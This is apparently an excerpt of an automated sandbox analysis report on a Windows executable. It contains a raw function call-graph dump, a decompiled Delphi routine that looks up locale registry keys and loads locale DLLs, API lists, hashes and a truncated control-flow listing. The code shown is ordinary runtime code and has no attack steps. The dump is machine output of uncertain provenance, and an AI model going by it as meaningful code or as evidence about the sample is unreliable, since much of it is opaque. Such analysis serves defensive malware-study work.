47537->47496 47538->47496 47539->47463 47540->47492 47541->47496 47543 6ed93c68 47542->47543 47544 6ed93bc1 __expandlocale 47542->47544 47543->46976 47544->47543 47546 6ed94360 47544->47546 47547 6ed94398 47546->47547 47548 6ed94408 47547->47548 47549 6ed943eb 47547->47549 47551 6ed943a8 47547->47551 47552 6ed96326 _fgetc 35 API calls 47548->47552 47562 6ed96326 47549->47562 47551->47544 47558 6ed94421 47552->47558 47553 6ed94577 47580 6eda293d std::exception::exception __CxxThrowException std::exception::exception 47553->47580 47556 6ed94581 47556->47551 47581 6ed965f9 21 API calls 3 library calls 47556->47581 47557 6ed94502 _memcpy_s 47557->47551 47558->47551 47558->47553 47558->47556 47558->47557 47561 6ed96326 _fgetc 35 API calls 47558->47561 47579 6ed94c00 _memmove std::exception::exception __CxxThrowException std::exception::exception std::_Xinvalid_argument 47558->47579 47561->47558 47563 6ed96332 47562->47563 47564 6ed9635d 47563->47564 47565 6ed96345 47563->47565 47567 6ed96b4f __lock_file 2 API calls 47564->47567 47592 6ed987f9 11 API calls __getptd_noexit 47565->47592 47576 6ed96363 47567->47576 47568 6ed9634a 47593 6ed987a7 6 API calls __lseeki64 47568->47593 47570 6ed963e6 47596 6ed96412 LeaveCriticalSection _fgetc 47570->47596 47571 6ed963d8 47571->47570 47582 6ed99076 47571->47582 47573 6ed96355 47573->47551 47576->47571 47594 6ed987f9 11 API calls __getptd_noexit 47576->47594 47577 6ed963cd 47595 6ed987a7 6 API calls __lseeki64 47577->47595 47579->47558 47580->47556 47581->47556 47583 6ed99098 47582->47583 47584 6ed99083 47582->47584 47588 6ed990c7 __getbuf 47583->47588 47589 6ed990d0 47583->47589 47591 6ed99093 47583->47591 47625 6ed987f9 11 API calls __getptd_noexit 47584->47625 47586 6ed99088 47626 6ed987a7 6 API calls __lseeki64 47586->47626 47588->47589 47597 6ed9d6d3 47589->47597 47591->47570 47592->47568 47593->47573 47594->47577 47595->47571 47596->47573 47598 6ed9d6df 47597->47598 47599 6ed9d702 47598->47599 47600 6ed9d6e7 47598->47600 47601 6ed9d70e 47599->47601 47606 6ed9d748 47599->47606 47627 6ed9880c 11 API calls __getptd_noexit 47600->47627 47629 6ed9880c 11 API calls __getptd_noexit 47601->47629 47604 6ed9d6ec 47628 6ed987f9 11 API calls __getptd_noexit 47604->47628 47605 6ed9d713 47630 6ed987f9 11 API calls __getptd_noexit 47605->47630 47609 6ed9d76a 47606->47609 47610 6ed9d755 47606->47610 47611 6ed9e23b ___lock_fhandle 3 API calls 47609->47611 47632 6ed9880c 11 API calls __getptd_noexit 47610->47632 47613 6ed9d770 47611->47613 47616 6ed9d77e 47613->47616 47617 6ed9d792 47613->47617 47614 6ed9d71b 47631 6ed987a7 6 API calls __lseeki64 47614->47631 47615 6ed9d75a 47633 6ed987f9 11 API calls __getptd_noexit 47615->47633 47620 6ed9d11c __read_nolock 28 API calls 47616->47620 47634 6ed987f9 11 API calls __getptd_noexit 47617->47634 47622 6ed9d6f4 47620->47622 47622->47591 47623 6ed9d797 47635 6ed9880c 11 API calls __getptd_noexit 47623->47635 47625->47586 47626->47591 47627->47604 47628->47622 47629->47605 47630->47614 47631->47622 47632->47615 47633->47614 47634->47623 47635->47622 47637 6ed99460 47636->47637 47638 6ed968eb __lock 47637->47638 47639 6ed96906 47638->47639 47640 6ed9699c _doexit 47638->47640 47639->47640 47641 6ed9691d DecodePointer 47639->47641 47644 6ed96a0a 47640->47644 47645 6ed967c7 _malloc 3 API calls 47640->47645 47641->47640 47642 6ed96934 DecodePointer 47641->47642 47648 6ed96947 47642->47648 47644->46993 47645->47644 47646 6ed9695e DecodePointer 47651 6ed9810c RtlEncodePointer 47646->47651 47648->47640 47648->47646 47649 6ed9696d DecodePointer DecodePointer 47648->47649 47650 6ed9810c RtlEncodePointer 47648->47650 47649->47648 47650->47648 47651->47648 47652 48d084 47661 406d0c GetModuleHandleA 47652->47661 47654 48d095 47665 464184 27 API calls 47654->47665 47656 48d0ae 47666 464634 114 API calls 47656->47666 47658 48d101 47667 4048c4 7 API calls 47658->47667 47662 406d3f 47661->47662 47668 4046fc 47662->47668 47664 406d4b 47664->47654 47665->47656 47666->47658 47669 40472f 47668->47669 47672 40468c 47669->47672 47673 4046a1 47672->47673 47674 4046d7 47672->47674 47673->47674 47679 450214 47673->47679 47693 402acc 47673->47693 47699 465f6c 47673->47699 47718 405e78 47673->47718 47674->47664 47680 45028c 47679->47680 47681 45022e GetVersion 47679->47681 47680->47673 47722 44ffc4 GetCurrentProcessId 47681->47722 47685 450252 47754 419344 58 API calls 47685->47754 47687 45025c 47755 4192f0 58 API calls 47687->47755 47689 45026c 47756 4192f0 58 API calls 47689->47756 47691 45027c 47757 4192f0 58 API calls 47691->47757 47694 402ad4 47693->47694 47695 402aec 47693->47695 47890 402478 47694->47890 47695->47673 47696 402adc 47696->47695 47901 402c00 11 API calls 47696->47901 47700 465f91 StarBurn_GetVersion 47699->47700 47701 466038 47699->47701 47702 465fd3 StarBurn_GetVersion 47700->47702 47703 465f9d 47700->47703 47951 404a64 11 API calls 47701->47951 47948 409320 25 API calls 47702->47948 47946 4092f8 25 API calls 47703->47946 47706 466052 47706->47673 47708 465faf 47947 404a94 25 API calls 47708->47947 47709 465fee 47949 4092f8 25 API calls 47709->47949 47712 465fc1 47715 465fcb OutputDebugStringA 47712->47715 47713 466008 47950 404dc0 25 API calls 47713->47950 47715->47701 47719 405ea4 47718->47719 47720 405e88 GetModuleFileNameA 47718->47720 47719->47673 47952 40610c GetModuleFileNameA RegOpenKeyExA 47720->47952 47758 40a164 47722->47758 47725 404a94 25 API calls 47726 45000d 47725->47726 47727 450017 GlobalAddAtomA GetCurrentThreadId 47726->47727 47728 40a164 56 API calls 47727->47728 47729 450051 47728->47729 47730 404a94 25 API calls 47729->47730 47731 45005e 47730->47731 47732 450068 GlobalAddAtomA 47731->47732 47761 404f00 47732->47761 47736 450095 47767 44fbc8 47736->47767 47738 45009f 47775 44f9f0 47738->47775 47740 4500ab 47779 461da8 47740->47779 47742 4500be 47796 462f94 47742->47796 47744 4500d4 47810 419430 58 API calls 47744->47810 47746 4500fe GetModuleHandleA 47747 45011e 47746->47747 47748 45010e GetProcAddress 47746->47748 47749 404a40 11 API calls 47747->47749 47748->47747 47750 450133 47749->47750 47751 404a40 11 API calls 47750->47751 47752 45013b 47751->47752 47753 4192a4 58 API calls 47752->47753 47753->47685 47754->47687 47755->47689 47756->47691 47757->47680 47811 40a178 47758->47811 47762 404f04 RegisterClipboardFormatA 47761->47762 47763 419f14 47762->47763 47764 419f1a 47763->47764 47765 419f2f RtlInitializeCriticalSection 47764->47765 47766 419f44 47765->47766 47766->47736 47768 44fd35 47767->47768 47769 44fbdc SetErrorMode 47767->47769 47768->47738 47770 44fc00 GetModuleHandleA GetProcAddress 47769->47770 47771 44fc1c 47769->47771 47770->47771 47772 44fd17 SetErrorMode 47771->47772 47773 44fc29 LoadLibraryA 47771->47773 47772->47738 47773->47772 47774 44fc45 10 API calls 47773->47774 47774->47772 47776 44f9f6 47775->47776 47777 44fb64 23 API calls 47776->47777 47778 44fa64 47777->47778 47778->47740 47780 461db2 47779->47780 47829 4226b0 47780->47829 47782 461dc8 47833 462164 LoadCursorA 47782->47833 47785 461e01 47786 461e3d 73BEAC50 73BEAD70 73BEB380 47785->47786 47787 461e73 47786->47787 47838 425958 47787->47838 47789 461e7f 47790 425958 27 API calls 47789->47790 47791 461e91 47790->47791 47792 425958 27 API calls 47791->47792 47793 461ea3 47792->47793 47794 46268c 38 API calls 47793->47794 47795 461eb0 47794->47795 47795->47742 47797 462fa3 47796->47797 47798 4226b0 56 API calls 47797->47798 47799 462fb9 47798->47799 47800 463064 LoadIconA 47799->47800 47856 42c580 47800->47856 47802 463087 GetModuleFileNameA OemToCharA 47803 4630d0 47802->47803 47804 463104 CharNextA CharLowerA 47803->47804 47805 46312c 47804->47805 47806 46313d 47805->47806 47858 4632b0 47805->47858 47882 465168 11 API calls 47806->47882 47809 46315f 47809->47744 47810->47746 47812 40a19d 47811->47812 47814 40a1c8 47812->47814 47824 409d54 56 API calls 47812->47824 47815 40a225 47814->47815 47822 40a1df 47814->47822 47828 404b30 25 API calls 47815->47828 47817 40a21a 47827 40508c 25 API calls 47817->47827 47818 40a173 47818->47725 47820 404a40 11 API calls 47820->47822 47822->47817 47822->47820 47825 40508c 25 API calls 47822->47825 47826 409d54 56 API calls 47822->47826 47824->47814 47825->47822 47826->47822 47827->47818 47828->47818 47830 4226b7 47829->47830 47832 4226da 47830->47832 47842 422868 56 API calls 47830->47842 47832->47782 47834 462183 47833->47834 47835 46219c LoadCursorA 47834->47835 47837 461deb GetKeyboardLayout 47834->47837 47843 4622a4 47835->47843 47837->47785 47839 42595e 47838->47839 47846 424e78 47839->47846 47841 425980 47841->47789 47842->47832 47844 402acc 25 API calls 47843->47844 47845 4622b7 47844->47845 47845->47834 47847 424e93 47846->47847 47854 424e60 RtlEnterCriticalSection 47847->47854 47849 424e9d 47851 402acc 25 API calls 47849->47851 47853 424efa 47849->47853 47851->47853 47852 424f4b 47852->47841 47855 424e6c RtlLeaveCriticalSection 47853->47855 47854->47849 47855->47852 47857 42c58c 47856->47857 47857->47802 47859 46343b 47858->47859 47860 4632d9 47858->47860 47861 404a40 11 API calls 47859->47861 47860->47859 47862 423758 VirtualAlloc 47860->47862 47863 463450 47861->47863 47864 4632f2 GetClassInfoA 47862->47864 47863->47806 47865 463318 RegisterClassA 47864->47865 47870 46334d 47864->47870 47866 463331 47865->47866 47865->47870 47887 406a3c 56 API calls 47866->47887 47868 46333e 47888 40cbec 25 API calls 47868->47888 47883 407b24 47870->47883 47872 4633a4 47873 404a40 11 API calls 47872->47873 47874 4633b2 SetWindowLongA 47873->47874 47875 4633d2 47874->47875 47876 4633fd GetSystemMenu DeleteMenu DeleteMenu 47874->47876 47878 463f30 63 API calls 47875->47878 47876->47859 47877 46342e DeleteMenu 47876->47877 47877->47859 47879 4633d9 SendMessageA 47878->47879 47880 463f30 63 API calls 47879->47880 47881 4633f1 SetClassLongA 47880->47881 47881->47876 47882->47809 47889 402f10 47883->47889 47885 407b37 CreateWindowExA 47886 407b6f 47885->47886 47886->47872 47887->47868 47888->47870 47889->47885 47891 40248a 47890->47891 47894 40248f 47890->47894 47902 401c1c RtlInitializeCriticalSection 47891->47902 47893 4024bc RtlEnterCriticalSection 47895 4024c6 47893->47895 47894->47893 47894->47895 47900 40249b 47894->47900 47895->47900 47909 402330 47895->47909 47898 402613 47898->47696 47899 402609 RtlLeaveCriticalSection 47899->47898 47900->47696 47901->47695 47903 401c41 RtlEnterCriticalSection 47902->47903 47904 401c4b 47902->47904 47903->47904 47905 401c69 LocalAlloc 47904->47905 47906 401c83 47905->47906 47907 401ce3 47906->47907 47908 401cd9 RtlLeaveCriticalSection 47906->47908 47907->47894 47908->47907 47912 402347 47909->47912 47910 402388 47914 4023af 47910->47914 47920 4020c8 9 API calls 47910->47920 47912->47910 47912->47914 47915 402298 47912->47915 47914->47898 47914->47899 47921 40199c 47915->47921 47917 4022a8 47918 4022b5 47917->47918 47930 40220c 9 API calls 47917->47930 47918->47912 47920->47914 47924 4019ba 47921->47924 47923 4019c8 47931 401820 47923->47931 47924->47923 47927 4019d6 47924->47927 47928 401a28 47924->47928 47935 40167c 47924->47935 47943 401530 LocalAlloc 47924->47943 47927->47917 47944 401758 VirtualFree 47928->47944 47930->47918 47933 401873 47931->47933 47932 4018c2 47932->47927 47933->47932 47934 4018a9 VirtualAlloc 47933->47934 47934->47932 47934->47933 47936 40168b VirtualAlloc 47935->47936 47938 4016b8 47936->47938 47939 4016db 47936->47939 47945 4014a0 LocalAlloc 47938->47945 47939->47924 47941 4016c4 47941->47939 47942 4016c8 VirtualFree 47941->47942 47942->47939 47943->47924 47944->47927 47945->47941 47946->47708 47947->47712 47948->47709 47949->47713 47951->47706 47953 40618e 47952->47953 47954 40614e RegOpenKeyExA 47952->47954 47970 405f34 12 API calls 47953->47970 47954->47953 47955 40616c RegOpenKeyExA 47954->47955 47955->47953 47957 406217 lstrcpyn GetThreadLocale GetLocaleInfoA 47955->47957 47959 406347 47957->47959 47960 40624e 47957->47960 47958 4061b3 RegQueryValueExA 47961 4061d3 RegQueryValueExA 47958->47961 47962 4061f1 RegCloseKey 47958->47962 47959->47719 47960->47959 47963 40625e lstrlen 47960->47963 47961->47962 47962->47719 47965 406277 47963->47965 47965->47959 47966 4062d1 47965->47966 47967 4062a5 lstrcpyn LoadLibraryExA 47965->47967 47966->47959 47968 4062db lstrcpyn LoadLibraryExA 47966->47968 47967->47966 47968->47959 47969 406311 lstrcpyn LoadLibraryExA 47968->47969 47969->47959 47970->47958 47971 6ed975c6 47972 6ed975d1 ___security_init_cookie 47971->47972 47973 6ed975d6 47971->47973 47972->47973 47976 6ed974d0 47973->47976 47975 6ed975e4 47977 6ed974dc 47976->47977 47981 6ed97579 47977->47981 47982 6ed97529 47977->47982 47984 6ed9736c 47977->47984 47979 6ed97559 47980 6ed9736c __CRT_INIT@12 84 API calls 47979->47980 47979->47981 47980->47981 47981->47975 47982->47979 47982->47981 47983 6ed9736c __CRT_INIT@12 84 API calls 47982->47983 47983->47979 47985 6ed97378 47984->47985 47986 6ed973fa 47985->47986 47987 6ed97380 47985->47987 47988 6ed9745b 47986->47988 47989 6ed97400 47986->47989 48025 6ed98fc1 HeapCreate 47987->48025 47992 6ed974b9 47988->47992 47993 6ed97460 47988->47993 47994 6ed9741e 47989->47994 48000 6ed97389 47989->48000 48090 6ed96a4b 10 API calls _doexit 47989->48090 47991 6ed97385 47991->48000 48026 6ed98473 GetModuleHandleW 47991->48026 47992->48000 48077 6ed98405 47992->48077 48074 6ed9811e TlsGetValue 47993->48074 47999 6ed97423 __ioterm __mtterm 47994->47999 47994->48000 48091 6ed98fdf HeapDestroy 47999->48091 48000->47982 48002 6ed97395 48005 6ed97399 48002->48005 48006 6ed973a0 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA 48002->48006 48088 6ed98fdf HeapDestroy 48005->48088 48046 6ed99198 GetStartupInfoW 48006->48046 48009 6ed9747d DecodePointer 48012 6ed97492 48009->48012 48015 6ed974ad 48012->48015 48016 6ed97496 48012->48016 48013 6ed973ca __setargv 48017 6ed973f3 __ioterm 48013->48017 48018 6ed973d3 48013->48018 48014 6ed973c3 __mtterm 48014->48005 48098 6ed96256 11 API calls 2 library calls 48015->48098 48021 6ed9749d GetCurrentThreadId 48016->48021 48017->48014 48059 6ed9b2e7 48018->48059 48021->48000 48024 6ed973e3 48024->48000 48024->48017 48025->47991 48027 6ed98490 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 48026->48027 48028 6ed98487 __mtterm 48026->48028 48030 6ed984da TlsAlloc 48027->48030 48028->48002 48031 6ed985e9 48030->48031 48032 6ed98528 TlsSetValue 48030->48032 48031->48002 48032->48031 48033 6ed98539 48032->48033 48099 6ed967f1 __initp_misc_winsig RtlEncodePointer __init_pointers _doexit 48033->48099 48035 6ed9853e EncodePointer EncodePointer EncodePointer EncodePointer 48036 6ed9857d 48035->48036 48037 6ed98581 DecodePointer 48036->48037 48038 6ed985e4 __mtterm 48036->48038 48039 6ed98596 48037->48039 48038->48031 48039->48038 48040 6ed99841 __calloc_crt 11 API calls 48039->48040 48041 6ed985ac 48040->48041 48041->48038 48042 6ed985b4 DecodePointer 48041->48042 48043 6ed985c5 48042->48043 48043->48038 48044 6ed985c9 48043->48044 48045 6ed985d1 GetCurrentThreadId 48044->48045 48045->48031 48047 6ed99841 __calloc_crt 11 API calls 48046->48047 48057 6ed991b6 48047->48057 48048 6ed99361 GetStdHandle 48054 6ed9932b 48048->48054 48049 6ed993c5 SetHandleCount 48051 6ed973bf 48049->48051 48050 6ed99841 __calloc_crt 11 API calls 48050->48057 48051->48013 48051->48014 48052 6ed99373 GetFileType 48052->48054 48053 6ed992ab 48053->48054 48055 6ed992e2 InitializeCriticalSectionAndSpinCount 48053->48055 48056 6ed992d7 GetFileType 48053->48056 48054->48048 48054->48049 48054->48052 48058 6ed99399 InitializeCriticalSectionAndSpinCount 48054->48058 48055->48051 48055->48053 48056->48053 48056->48055 48057->48050 48057->48051 48057->48053 48057->48054 48057->48057 48058->48051 48058->48054 48060 6ed9b2f0 ___initmbctable 48059->48060 48062 6ed9b2f5 _strlen 48059->48062 48060->48062 48061 6ed973d8 48061->48017 48089 6ed96848 11 API calls 2 library calls 48061->48089 48062->48061 48063 6ed99841 __calloc_crt 11 API calls 48062->48063 48065 6ed9b32a _strlen 48063->48065 48064 6ed9b379 48101 6ed96256 11 API calls 2 library calls 48064->48101 48065->48061 48065->48064 48067 6ed99841 __calloc_crt 11 API calls 48065->48067 48068 6ed9b39f 48065->48068 48071 6ed9b3b6 48065->48071 48100 6ed98948 17 API calls __lseeki64 48065->48100 48067->48065 48102 6ed96256 11 API calls 2 library calls 48068->48102 48072 6ed98755 __invoke_watson 5 API calls 48071->48072 48073 6ed9b3c2 48072->48073 48075 6ed97465 48074->48075 48076 6ed98133 RtlDecodePointer TlsSetValue 48074->48076 48092 6ed99841 48075->48092 48076->48075 48078 6ed9845e 48077->48078 48079 6ed98413 48077->48079 48080 6ed98468 TlsSetValue 48078->48080 48081 6ed98471 48078->48081 48082 6ed98419 TlsGetValue 48079->48082 48083 6ed98440 RtlDecodePointer 48079->48083 48080->48081 48081->48000 48084 6ed9842c TlsGetValue 48082->48084 48085 6ed9843c 48082->48085 48086 6ed98456 48083->48086 48084->48085 48085->48083 48103 6ed982d6 16 API calls 2 library calls 48086->48103 48088->48000 48089->48024 48090->47994 48091->48000 48094 6ed9984a 48092->48094 48095 6ed97471 48094->48095 48096 6ed99868 Sleep 48094->48096 48104 6ed9d81f 48094->48104 48095->48000 48095->48009 48097 6ed9987d 48096->48097 48097->48094 48097->48095 48098->48000 48099->48035 48100->48065 48101->48061 48102->48061 48103->48078 48105 6ed9d82b 48104->48105 48111 6ed9d846 48104->48111 48106 6ed9d837 48105->48106 48105->48111 48112 6ed987f9 11 API calls __getptd_noexit 48106->48112 48108 6ed9d859 RtlAllocateHeap 48110 6ed9d880 48108->48110 48108->48111 48109 6ed9d83c 48109->48094 48110->48094 48111->48108 48111->48110 48112->48109

      Executed Functions

      Function 0040610C Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 65%
      			E0040610C(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char* _v32;
				char _v293;
				long _t58;
				long _t75;
				long _t77;
				CHAR* _t84;
				CHAR* _t87;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t101;
				struct HINSTANCE__* _t110;
				intOrPtr _t115;
				void* _t124;
				void* _t126;
				intOrPtr _t127;

				_t124 = _t126;
				_t127 = _t126 + 0xfffffedc;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v293, 0x105);
				_v22 = 0;
				_t58 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t58 == 0) {
					L3:
					_push(_t124);
					_push(0x406210);
					_push( *[fs:eax]);
					 *[fs:eax] = _t127;
					_v28 = 5;
					E00405F34( &_v293, 0x105);
					if(RegQueryValueExA(_v12,  &_v293, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040638C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E00406217);
					return RegCloseKey(_v12);
				} else {
					_t75 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t75 == 0) {
						goto L3;
					} else {
						_t77 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t77 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v293);
							L00401338();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t110 = 0;
							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t84 =  &_v293;
								_push(_t84);
								L00401340();
								_v32 = _t84 +  &_v293;
								while( *_v32 != 0x2e &&  &_v293 != _v32) {
									_v32 = _v32 - 1;
								}
								_t87 =  &_v293;
								if(_t87 != _v32) {
									_v32 = _v32 + 1;
									if(_v22 != 0) {
										_push(0x105 - _v32 - _t87);
										_push( &_v22);
										_push(_v32);
										L00401338();
										_t110 = LoadLibraryExA( &_v293, 0, 2);
									}
									if(_t110 == 0 && _v17 != 0) {
										_push(0x105 - _v32 -  &_v293);
										_push( &_v17);
										_push(_v32);
										L00401338();
										_t94 = LoadLibraryExA( &_v293, 0, 2); // executed
										_t110 = _t94;
										if(_t110 == 0) {
											_v15 = 0;
											_push(0x105 - _v32 -  &_v293);
											_push( &_v17);
											_push(_v32);
											L00401338();
											_t101 = LoadLibraryExA( &_v293, 0, 2); // executed
											_t110 = _t101;
										}
									}
								}
							}
							return _t110;
						} else {
							goto L3;
						}
					}
				}
			}
























      0x0040610d
      0x0040610f
      0x00406116
      0x00406127
      0x0040612c
      0x00406145
      0x0040614c
      0x0040618e
      0x00406190
      0x00406191
      0x00406196
      0x00406199
      0x0040619c
      0x004061ae
      0x004061d1
      0x004061f1
      0x004061f1
      0x004061f5
      0x004061fb
      0x004061fe
      0x00406201
      0x0040620f
      0x0040614e
      0x00406163
      0x0040616a
      0x00000000
      0x0040616c
      0x00406181
      0x00406188
      0x00406217
      0x0040621f
      0x00406226
      0x00406227
      0x0040623a
      0x0040623f
      0x00406248
      0x0040625e
      0x00406264
      0x00406265
      0x00406272
      0x0040627a
      0x00406277
      0x00406277
      0x0040628d
      0x00406296
      0x0040629c
      0x004062a3
      0x004062b1
      0x004062b5
      0x004062b9
      0x004062ba
      0x004062cf
      0x004062cf
      0x004062d3
      0x004062ed
      0x004062f1
      0x004062f5
      0x004062f6
      0x00406306
      0x0040630b
      0x0040630f
      0x00406311
      0x00406327
      0x0040632b
      0x0040632f
      0x00406330
      0x00406340
      0x00406345
      0x00406345
      0x0040630f
      0x004062d3
      0x00406296
      0x0040634d
      0x00000000
      0x00000000
      0x00000000
      0x00406188
      0x0040616a

      APIs
      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0048E0A8), ref: 00406127
      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0048E0A8), ref: 00406145
      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0048E0A8), ref: 00406163
      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406181
      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00406210,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004061CA
      • RegQueryValueExA.ADVAPI32(?,0040638C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00406210,?,80000001), ref: 004061E8
      • RegCloseKey.ADVAPI32(?,00406217,00000000,?,?,00000000,00406210,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040620A
      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00406227
      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00406234
      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040623A
      • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00406265
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004062BA
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004062CA
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004062F6
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406306
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406330
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 00406340
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
      • API String ID: 1759228003-2375825460
      • Opcode ID: 2efafc2d468421ca2c69aef3762a3f7c81f1f9f2ad4b459394d9ed83abf749a0
      • Instruction ID: 7c224e0b8b07be3a078314fc2ad44a8c4e545e27136a8e3aef4647d0922f16c7
      • Opcode Fuzzy Hash: 2efafc2d468421ca2c69aef3762a3f7c81f1f9f2ad4b459394d9ed83abf749a0
      • Instruction Fuzzy Hash: FE615E71A402097EEB10EAE5CC46FEFB7BC9B18704F4140B6BA05F65C1D6BC9A548B68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00463830 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 399COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 58 463830-463864 59 463866-463867 58->59 60 463898-4638ad call 4636e4 58->60 62 463869-463885 call 419c84 59->62 65 4638b3 60->65 66 463961-463966 60->66 93 463887-46388f 62->93 94 463894-463896 62->94 70 463dfc-463e11 call 464a04 65->70 71 4638b9-4638bc 65->71 68 4639b7-4639bc 66->68 69 463968 66->69 77 4639be 68->77 78 4639dd-4639e2 68->78 73 463cd4-463cdc 69->73 74 46396e-463973 69->74 86 463edd-463ee5 70->86 75 4638be 71->75 76 463928-46392b 71->76 85 463ce2-463ced call 44b158 73->85 73->86 83 463975 74->83 84 46399e-4639a3 74->84 87 463bc4-463bcb 75->87 88 4638c4-4638c7 75->88 89 46392d 76->89 90 46394a-46394d 76->90 91 463e16-463e1d 77->91 92 4639c4-4639c9 77->92 80 463e4f-463e56 78->80 81 4639e8-4639ee 78->81 113 463e58-463e67 80->113 114 463e69-463e78 80->114 98 4639f4 81->98 99 463c91-463cad call 465a14 81->99 106 463d6d-463d78 83->106 107 46397b-463980 83->107 111 463d95-463da0 84->111 112 4639a9-4639ac 84->112 85->86 152 463cf3-463d02 call 44b158 IsWindowEnabled 85->152 97 463efc-463f02 86->97 87->86 115 463bd1-463bd6 call 4048c4 87->115 100 463ed6-463ed7 call 4637a8 88->100 101 4638cd 88->101 102 463933-463936 89->102 103 463ea0-463eb1 call 462cd4 call 4637a8 89->103 104 463953-463956 90->104 105 463a8f-463a9d call 463f30 90->105 108 463e37-463e4a call 464510 91->108 109 463e1f-463e32 call 4644b4 91->109 95 4639cf-4639d2 92->95 96 463dbd-463dcb IsIconic 92->96 93->97 94->60 94->62 95->70 117 4639d8 95->117 96->86 121 463dd1-463ddc GetFocus 96->121 98->100 99->86 148 463edc 100->148 101->76 122 46393c-46393f 102->122 123 463e7a-463e9e call 44fb64 call 46373c call 4637a8 102->123 103->86 125 46395c 104->125 126 463bdb-463be7 104->126 105->86 106->86 118 463d7e-463d90 106->118 129 463982-463988 107->129 130 4639f9-463a09 107->130 108->86 109->86 111->86 120 463da6-463db8 111->120 134 463cb2-463cbf call 464374 112->134 135 4639b2 112->135 113->86 114->86 115->86 117->100 118->86 120->86 121->86 142 463de2-463deb call 